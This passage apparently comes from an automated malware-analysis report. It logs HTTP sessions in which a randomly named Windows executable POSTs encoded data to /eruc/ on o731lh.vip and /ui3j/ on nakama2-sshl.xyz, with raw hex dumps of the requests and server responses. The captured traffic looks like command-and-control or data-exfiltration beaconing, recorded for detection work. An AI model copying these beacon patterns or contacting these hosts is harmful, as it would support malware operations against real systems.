                                                                                                                  Data Raw: 6e 56 3d 35 72 76 48 32 35 33 4d 2f 64 2b 61 76 49 49 6c 70 6c 65 36 46 43 34 5a 30 53 52 51 59 6e 75 63 66 33 55 5a 71 45 6d 41 31 4c 39 61 64 30 41 4a 61 64 56 70 74 45 41 50 71 33 2f 53 43 72 70 4e 78 56 71 4d 2b 75 70 52 52 69 4d 6c 77 36 47 33 64 65 69 79 5a 33 6f 39 61 49 34 4e 56 67 41 78 70 42 6d 31 6e 32 5a 72 34 38 5a 71 46 76 68 54 6c 5a 50 2f 39 38 32 72 52 46 63 67 4c 52 36 73 44 77 7a 4f 51 38 59 45 55 76 4d 6b 41 49 56 68 61 56 75 5a 7a 39 52 39 76 78 4c 6c 79 5a 51 74 6a 67 4a 6b 41 58 48 51 66 43 44 55 6b 56 72 58 64 36 65 56 41 48 67 54 42 67 57 39 41 71 38 56 43 4b 74 36 4c 54 4f 58 46 78 6c 39 75 44 33 56 6e 67 49 74 77 4f 77 51 6a 34 61 38
                                                                                                                  Data Ascii: nV=5rvH253M/d+avIIlple6FC4Z0SRQYnucf3UZqEmA1L9ad0AJadVptEAPq3/SCrpNxVqM+upRRiMlw6G3deiyZ3o9aI4NVgAxpBm1n2Zr48ZqFvhTlZP/982rRFcgLR6sDwzOQ8YEUvMkAIVhaVuZz9R9vxLlyZQtjgJkAXHQfCDUkVrXd6eVAHgTBgW9Aq8VCKt6LTOXFxl9uD3VngItwOwQj4a8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.5499863.33.130.190804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:47.385597944 CEST1752OUTPOST /eruc/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.o731lh.vip
                                                                                                                  Origin: http://www.o731lh.vip
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.o731lh.vip/eruc/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 35 72 76 48 32 35 33 4d 2f 64 2b 61 76 49 49 6c 70 6c 65 36 46 43 34 5a 30 53 52 51 59 6e 75 63 66 33 55 5a 71 45 6d 41 31 4c 46 61 65 44 41 4a 62 2b 74 70 75 45 41 50 31 48 2b 56 43 72 6f 66 78 52 2b 49 2b 75 6c 42 52 67 30 6c 78 63 36 33 49 66 69 79 53 33 6f 39 59 49 34 4f 62 41 42 31 70 42 57 35 6e 32 70 72 34 38 5a 71 46 73 4a 54 73 6f 50 2f 2f 38 32 71 57 46 63 73 64 52 37 69 44 30 66 65 51 38 63 2b 58 63 55 6b 44 72 39 68 62 67 79 5a 34 39 52 6a 73 78 4b 6a 79 5a 63 79 6a 67 56 43 41 57 44 36 66 42 6a 55 6c 31 75 70 4d 4b 6a 4a 61 57 67 50 50 42 71 67 55 2f 6b 72 46 6f 6c 32 4a 44 4b 58 59 68 70 53 34 6e 50 61 7a 55 64 66 78 4c 38 47 71 34 75 39 72 7a 49 5a 45 50 68 53 72 5a 45 4d 54 78 71 31 46 74 43 2b 42 67 72 7a 53 58 62 41 56 68 34 2f 4d 52 54 77 35 64 78 72 70 50 50 35 77 35 4d 43 58 41 4f 37 43 47 4c 47 30 4a 54 6e 33 4e 7a 55 75 6c 48 54 50 69 68 79 6b 34 54 39 6e 42 4c 46 66 6e 49 4f 37 76 4f 39 30 38 49 59 6b 65 69 52 65 7a 36 56 37 77 35 72 76 34 48 4a 2b 50 4d 41 41 4d 2f [TRUNCATED]
                                                                                                                  Data Ascii: nV=5rvH253M/d+avIIlple6FC4Z0SRQYnucf3UZqEmA1LFaeDAJb+tpuEAP1H+VCrofxR+I+ulBRg0lxc63IfiyS3o9YI4ObAB1pBW5n2pr48ZqFsJTsoP//82qWFcsdR7iD0feQ8c+XcUkDr9hbgyZ49RjsxKjyZcyjgVCAWD6fBjUl1upMKjJaWgPPBqgU/krFol2JDKXYhpS4nPazUdfxL8Gq4u9rzIZEPhSrZEMTxq1FtC+BgrzSXbAVh4/MRTw5dxrpPP5w5MCXAO7CGLG0JTn3NzUulHTPihyk4T9nBLFfnIO7vO908IYkeiRez6V7w5rv4HJ+PMAAM/h99hHZedR5Ys4xWqsLdPUwhcMcskdVLOsyivvSYcNXM44TYdwRBDHO8zGZspoP7FpM65xDkZa785aQBz0ND6nPmDpmU9n0lsPzMZWKcU/YOvpg8hjlMNiSSTRyI7w9EG0K+BbZi7+jcil4KGUZG4P4aj0hL0oOySMq/Zn9PvAebdpyK4ti1XSzBgv+t5LpsLA9c2uKqJhlMVin+8IHnDwz+arulUVfOmDE0KMbsmT/QEwQypPjLMPl9MAdQ07gqe+BOi+hNk07YjbUs6DQhEjiSYQSyyQrVaRxMV67cFqOzXR99X4xrzLtA0/N6hPsZGKD2mMpOfYXeVn0J6XmRuu69PNyqR7U3fr8wTZ35WzPYUAUC6v+PtqmB33/WaEF5Mf8EJ2O4lCEbH6XT0rjD9DzG5QnDPqkPADr03qd9tMo9kt1H/FfKWVb4fybjypv4wCaotr5l02+0QkOrlyNsVG+a1bzsfqbT1fzHPJeiKII5B92gsp/LKV/RixnsmYv8WbmyIUpgFUtUMsY2ezrq0+Ej/aZpf7lhuynjyQSSCsXopgzjdxCKvLwJH3Oow5EtFYFTfnaEbHHEDUmCmovsFST/BdSBII9oz/u1su5n/IeheRU2jEJ92KQZuV3JV2FTr2MVhHJRfvB/SH+hdRGfBTU9ihfSkS0bRum [TRUNCATED]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.5499873.33.130.190804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:49.925474882 CEST468OUTGET /eruc/?ntHx=DVDDWR70P4Ux&nV=0pHn1M2gwaL5mql+tyiDCW8+wEBXBUyoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJSHRFZ9VRSgAmugrmpHJKo8BhJN8eoKLjgrj/d04fMg3yYg== HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.o731lh.vip
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Oct 8, 2024 15:38:50.414079905 CEST408INHTTP/1.1 200 OK
                                                                                                                  Server: openresty
                                                                                                                  Date: Tue, 08 Oct 2024 13:38:50 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 268
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 74 48 78 3d 44 56 44 44 57 52 37 30 50 34 55 78 26 6e 56 3d 30 70 48 6e 31 4d 32 67 77 61 4c 35 6d 71 6c 2b 74 79 69 44 43 57 38 2b 77 45 42 58 42 55 79 6f 46 47 4d 58 75 33 61 61 34 71 5a 49 46 68 49 5a 54 70 35 38 39 56 38 52 72 41 4f 62 53 38 73 65 2b 52 79 5a 6d 4a 64 6b 56 51 77 39 77 61 53 46 64 66 61 4a 53 48 52 46 5a 39 56 52 53 67 41 6d 75 67 72 6d 70 48 4a 4b 6f 38 42 68 4a 4e 38 65 6f 4b 4c 6a 67 72 6a 2f 64 30 34 66 4d 67 33 79 59 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ntHx=DVDDWR70P4Ux&nV=0pHn1M2gwaL5mql+tyiDCW8+wEBXBUyoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJSHRFZ9VRSgAmugrmpHJKo8BhJN8eoKLjgrj/d04fMg3yYg=="}</script></head></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.549988183.181.83.131804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:55.979124069 CEST733OUTPOST /ui3j/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.nakama2-sshl.xyz
                                                                                                                  Origin: http://www.nakama2-sshl.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.nakama2-sshl.xyz/ui3j/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 4a 78 32 41 7a 44 49 56 6b 68 6a 59 61 61 69 35 72 46 63 7a 36 59 46 54 36 30 62 33 4a 58 37 4c 39 76 72 6f 58 4f 61 73 70 45 4c 30 53 67 62 54 68 79 4e 34 6a 77 72 31 32 45 6b 6a 50 4f 2b 51 43 36 62 54 72 47 57 67 57 37 54 39 65 6d 31 4d 65 45 39 62 30 75 58 44 2b 58 45 55 52 5a 45 61 41 4d 6b 51 46 6b 68 4a 76 59 54 6e 52 2f 72 5a 41 44 52 41 66 42 31 64 30 2b 73 51 57 34 6c 4a 45 4e 48 41 56 62 57 64 59 51 48 65 46 57 38 44 54 6b 2f 43 63 46 31 4c 66 35 62 49 77 2f 4d 37 7a 58 71 55 4b 77 43 39 6e 49 6c 50 50 4d 6b 7a 62 78 6d 37 49 75 69 4b 4f 63 6e 4d 37 4b 30 32 31 74 6a 55 79 76 49 3d
                                                                                                                  Data Ascii: nV=Jx2AzDIVkhjYaai5rFcz6YFT60b3JX7L9vroXOaspEL0SgbThyN4jwr12EkjPO+QC6bTrGWgW7T9em1MeE9b0uXD+XEURZEaAMkQFkhJvYTnR/rZADRAfB1d0+sQW4lJENHAVbWdYQHeFW8DTk/CcF1Lf5bIw/M7zXqUKwC9nIlPPMkzbxm7IuiKOcnM7K021tjUyvI=
                                                                                                                  Oct 8, 2024 15:38:56.865907907 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:38:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                  Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 [TRUNCATED]
                                                                                                                  Data Ascii: 18c4\{#u{hZV3r@`,[SVKVV``&kT%+wnFi$ULHq^s=}n7~.>CRYe,_z!i2ZC-6r,laeY2QuJGD6]CkI}h{99uEq:RPloQj7G[vsQ\-#W,sk\7rO_|X^I[;t#wh;nKM,5PK3\Ukv! mc1*84_ncpeM8?>u&ib,g#-",pm7rZoFbgBn_|"=SI]FN]zZEUNi1u;MM2i6(pzIXyk}sde5zh60)dNukfC 1d2Gi{:5_4c%$Y+$9%ois!%-_9YW8N2tuKfk#5-G"[f}Y$d5hALW`3|vQ/yyij^-SkIeii1<CMUA.C,o]Z,c}ucl]Yl1}xO+-m%{c
                                                                                                                  Oct 8, 2024 15:38:56.865984917 CEST1236INData Raw: b6 64 d7 68 61 9c de ae 18 15 23 7b 9c 35 80 28 9d 81 27 f3 09 8e 8b 6d 80 d3 b0 bc 56 2e 4f 35 47 eb 35 0d 97 c8 d1 9b e3 a7 98 9d ae 0f 19 18 86 2d 93 54 30 7c a5 d9 d2 9b f5 6c 0c 9c 98 c4 f0 72 b9 55 5e ad 65 0f 67 42 09 85 4d d4 af 1a 2d b5
                                                                                                                  Data Ascii: dha#{5('mV.O5G5-T0|lrU^egBM-gkUc-aqYWX-]B`#BjKfjet.YaVJQ]PcA*kKZ.)$q<ZO#bZTh=FL%15PW@CJB:^TT
                                                                                                                  Oct 8, 2024 15:38:56.865997076 CEST1236INData Raw: c7 13 85 33 00 e4 13 33 20 b2 6c e1 0c 00 d9 bc 0c 78 22 ff 38 03 44 31 33 09 73 01 95 13 f4 54 1e c5 0e 78 36 c1 cb 4c f2 fc 39 fd b0 b2 80 ea 30 34 dd 07 4e 3c e4 5a 99 b6 ae 20 ac de e8 5b 83 8e 69 a3 bc 20 01 45 49 94 1d 70 8c b1 02 83 7a 69
                                                                                                                  Data Ascii: 33 lx"8D13sTx6L904N<Z [i EIpziyrxwu";(luM(xbbQ^-""2SVoRjZDZB<eF;*PU'J<t,#bNY3^c=iA*[9(dzvT
                                                                                                                  Oct 8, 2024 15:38:56.866009951 CEST1236INData Raw: b0 67 9c 0b 51 bc ed ae 23 72 2f ac a3 ce aa 30 b0 a4 81 b5 b4 94 5b 2a c1 bc 1f a0 ab 54 85 9c 63 5b 54 f4 ab e7 98 d8 04 d8 1c 91 ab e9 30 ff 3d cc 60 73 4b b8 25 23 c3 3b f7 68 ba a1 e9 dd 04 e7 d0 dd 04 d3 43 f8 1c 10 26 73 04 c4 10 54 e3 34
                                                                                                                  Data Ascii: gQ#r/0[*Tc[T0=`sK%#;hC&sT4\vr]q6Cx!mD@.($EnLn9"g+D]p)D874Defl2,:4-fm_;+7Gz|Y\Yp>}p[x
                                                                                                                  Oct 8, 2024 15:38:56.866055965 CEST1236INData Raw: 53 38 0d 0f 3e f1 d8 1f 2f 07 10 f7 f2 ff 06 47 39 04 59 96 44 4a e1 49 50 7c 96 d3 40 7e e3 37 22 65 13 ce 94 7c 0d 71 6b c2 43 a3 8b 87 88 8c 4c b3 45 9b 05 65 44 68 76 6c 9b 20 35 43 94 c4 f9 4b 04 25 b8 db dd d9 32 ed b6 13 2e 62 a3 bf 59 29
                                                                                                                  Data Ascii: S8>/G9YDJIP|@~7"e|qkCLEeDhvl 5CK%2.bY)W*J]Q$H$FN[-kLR mIG>}9vWZFaM?qKZ6ayeuh;65xGH_v
                                                                                                                  Oct 8, 2024 15:38:56.866069078 CEST546INData Raw: 56 e5 92 5a a5 22 72 84 b6 f9 8c a1 e9 72 ab 3b 43 23 0a b1 fa 8e b5 df 36 2d 2b 4e 5b b5 a4 d6 a9 cc 99 68 8b 0d 39 1d 4d 34 59 9c e6 c2 3b 0f db 9e 8c 95 75 b5 fc e6 82 72 1f bd af f5 81 07 2f 5c bc 70 49 ba 4f 59 a0 8a a9 dd be de 5e 41 71 c9
                                                                                                                  Data Ascii: VZ"rr;C#6-+N[h9M4Y;ur/\pIOY^AqU_8;6Uy${VsZ$?k7_d/a9/N-JX<`^xc32(;aVs/wj|CNOi&=~Jiw(~J@K&FT?D%


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.549989183.181.83.131804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:58.526508093 CEST753OUTPOST /ui3j/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.nakama2-sshl.xyz
                                                                                                                  Origin: http://www.nakama2-sshl.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.nakama2-sshl.xyz/ui3j/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 4a 78 32 41 7a 44 49 56 6b 68 6a 59 62 36 53 35 75 6d 6b 7a 38 34 46 4d 31 55 62 33 44 33 37 50 39 76 6e 6f 58 50 75 38 70 32 76 30 53 43 44 54 69 33 68 34 69 77 72 31 69 55 6b 36 42 75 2b 62 43 36 47 75 72 47 71 67 57 34 76 39 65 6a 5a 4d 65 58 6c 59 37 65 58 42 34 58 45 57 53 70 45 61 41 4d 6b 51 46 6b 45 55 76 59 4c 6e 52 50 37 5a 42 69 52 44 44 78 31 43 7a 2b 73 51 53 34 6c 46 45 4e 48 69 56 61 36 6e 59 56 4c 65 46 57 73 44 54 32 58 42 4a 31 31 4a 52 5a 61 6e 38 66 6c 32 7a 33 36 35 50 7a 33 55 2f 4b 52 4f 44 61 4a 5a 42 54 75 54 62 4f 4f 79 65 50 76 37 71 36 56 66 76 4f 7a 6b 73 34 66 72 6c 6d 44 61 34 37 61 67 4d 2f 61 45 31 42 70 44 58 73 63 57
                                                                                                                  Data Ascii: nV=Jx2AzDIVkhjYb6S5umkz84FM1Ub3D37P9vnoXPu8p2v0SCDTi3h4iwr1iUk6Bu+bC6GurGqgW4v9ejZMeXlY7eXB4XEWSpEaAMkQFkEUvYLnRP7ZBiRDDx1Cz+sQS4lFENHiVa6nYVLeFWsDT2XBJ11JRZan8fl2z365Pz3U/KRODaJZBTuTbOOyePv7q6VfvOzks4frlmDa47agM/aE1BpDXscW
                                                                                                                  Oct 8, 2024 15:38:59.366974115 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:38:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                  Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 [TRUNCATED]
                                                                                                                  Data Ascii: 18c4\{#u{hZV3r@`,[SVKVV``&kT%+wnFi$ULHq^s=}n7~.>CRYe,_z!i2ZC-6r,laeY2QuJGD6]CkI}h{99uEq:RPloQj7G[vsQ\-#W,sk\7rO_|X^I[;t#wh;nKM,5PK3\Ukv! mc1*84_ncpeM8?>u&ib,g#-",pm7rZoFbgBn_|"=SI]FN]zZEUNi1u;MM2i6(pzIXyk}sde5zh60)dNukfC 1d2Gi{:5_4c%$Y+$9%ois!%-_9YW8N2tuKfk#5-G"[f}Y$d5hALW`3|vQ/yyij^-SkIeii1<CMUA.C,o]Z,c}ucl]Yl1}xO+-m%{c
                                                                                                                  Oct 8, 2024 15:38:59.366990089 CEST1236INData Raw: b6 64 d7 68 61 9c de ae 18 15 23 7b 9c 35 80 28 9d 81 27 f3 09 8e 8b 6d 80 d3 b0 bc 56 2e 4f 35 47 eb 35 0d 97 c8 d1 9b e3 a7 98 9d ae 0f 19 18 86 2d 93 54 30 7c a5 d9 d2 9b f5 6c 0c 9c 98 c4 f0 72 b9 55 5e ad 65 0f 67 42 09 85 4d d4 af 1a 2d b5
                                                                                                                  Data Ascii: dha#{5('mV.O5G5-T0|lrU^egBM-gkUc-aqYWX-]B`#BjKfjet.YaVJQ]PcA*kKZ.)$q<ZO#bZTh=FL%15PW@CJB:^TT
                                                                                                                  Oct 8, 2024 15:38:59.367002964 CEST1236INData Raw: c7 13 85 33 00 e4 13 33 20 b2 6c e1 0c 00 d9 bc 0c 78 22 ff 38 03 44 31 33 09 73 01 95 13 f4 54 1e c5 0e 78 36 c1 cb 4c f2 fc 39 fd b0 b2 80 ea 30 34 dd 07 4e 3c e4 5a 99 b6 ae 20 ac de e8 5b 83 8e 69 a3 bc 20 01 45 49 94 1d 70 8c b1 02 83 7a 69
                                                                                                                  Data Ascii: 33 lx"8D13sTx6L904N<Z [i EIpziyrxwu";(luM(xbbQ^-""2SVoRjZDZB<eF;*PU'J<t,#bNY3^c=iA*[9(dzvT
                                                                                                                  Oct 8, 2024 15:38:59.367012978 CEST1236INData Raw: b0 67 9c 0b 51 bc ed ae 23 72 2f ac a3 ce aa 30 b0 a4 81 b5 b4 94 5b 2a c1 bc 1f a0 ab 54 85 9c 63 5b 54 f4 ab e7 98 d8 04 d8 1c 91 ab e9 30 ff 3d cc 60 73 4b b8 25 23 c3 3b f7 68 ba a1 e9 dd 04 e7 d0 dd 04 d3 43 f8 1c 10 26 73 04 c4 10 54 e3 34
                                                                                                                  Data Ascii: gQ#r/0[*Tc[T0=`sK%#;hC&sT4\vr]q6Cx!mD@.($EnLn9"g+D]p)D874Defl2,:4-fm_;+7Gz|Y\Yp>}p[x
                                                                                                                  Oct 8, 2024 15:38:59.367024899 CEST896INData Raw: 53 38 0d 0f 3e f1 d8 1f 2f 07 10 f7 f2 ff 06 47 39 04 59 96 44 4a e1 49 50 7c 96 d3 40 7e e3 37 22 65 13 ce 94 7c 0d 71 6b c2 43 a3 8b 87 88 8c 4c b3 45 9b 05 65 44 68 76 6c 9b 20 35 43 94 c4 f9 4b 04 25 b8 db dd d9 32 ed b6 13 2e 62 a3 bf 59 29
                                                                                                                  Data Ascii: S8>/G9YDJIP|@~7"e|qkCLEeDhvl 5CK%2.bY)W*J]Q$H$FN[-kLR mIG>}9vWZFaM?qKZ6ayeuh;65xGH_v
                                                                                                                  Oct 8, 2024 15:38:59.367036104 CEST886INData Raw: 7b 3a d7 04 84 eb 2c 54 17 a0 4e c8 2b 43 cb 26 f2 2a 42 52 66 e8 94 ac f8 df ca f5 32 8b a0 1d 8a cc 58 e9 56 99 eb 49 3a c2 6f b3 aa c3 e0 f8 d4 b2 f8 36 ab 9a 4c ae ff ff cd aa 86 5e 26 8c 43 c4 a1 4a fc 89 79 1e 5e 01 81 48 2e 1c c1 fd 07 45
                                                                                                                  Data Ascii: {:,TN+C&*BRf2XVI:o6L^&CJy^H.E?)xB}1&vklnnX#)VsTmGQWWZ_"g??qzjNHm}nj}l\J7rtKMW$[Xm5#k}<Z52U\X


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.549990183.181.83.131804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:01.454221010 CEST1770OUTPOST /ui3j/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.nakama2-sshl.xyz
                                                                                                                  Origin: http://www.nakama2-sshl.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.nakama2-sshl.xyz/ui3j/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 4a 78 32 41 7a 44 49 56 6b 68 6a 59 62 36 53 35 75 6d 6b 7a 38 34 46 4d 31 55 62 33 44 33 37 50 39 76 6e 6f 58 50 75 38 70 32 6e 30 53 7a 6a 54 68 51 56 34 7a 41 72 31 68 55 6b 6e 42 75 2b 43 43 36 66 6c 72 47 6e 56 57 2b 72 39 4d 78 52 4d 4b 32 6c 59 67 75 58 42 31 33 45 54 52 5a 46 61 41 4d 30 55 46 6b 30 55 76 59 4c 6e 52 4a 66 5a 47 7a 52 44 42 78 31 64 30 2b 74 43 57 34 6b 51 45 4e 66 59 56 61 4f 33 5a 6d 44 65 46 79 77 44 53 43 33 42 4c 56 31 58 57 5a 61 2f 38 66 34 32 7a 33 6d 44 50 79 43 35 2f 4a 42 4f 48 38 55 50 65 6e 69 79 4b 2f 76 66 56 4f 76 68 38 66 55 79 75 73 50 4b 78 49 37 39 6b 31 33 53 33 63 72 68 46 2f 4c 66 73 45 68 51 47 4c 31 44 36 65 6e 46 33 50 48 58 44 2b 55 6b 48 56 36 43 68 32 4b 58 73 74 50 72 62 4b 59 68 66 73 76 6c 51 50 5a 72 4f 31 6f 33 72 51 66 7a 50 79 4d 31 2f 66 68 34 46 68 6c 56 6c 71 68 6d 74 61 6a 51 6d 75 76 71 59 77 4d 77 70 38 56 6b 41 4f 48 44 35 4e 6b 6a 47 2f 52 57 67 52 2f 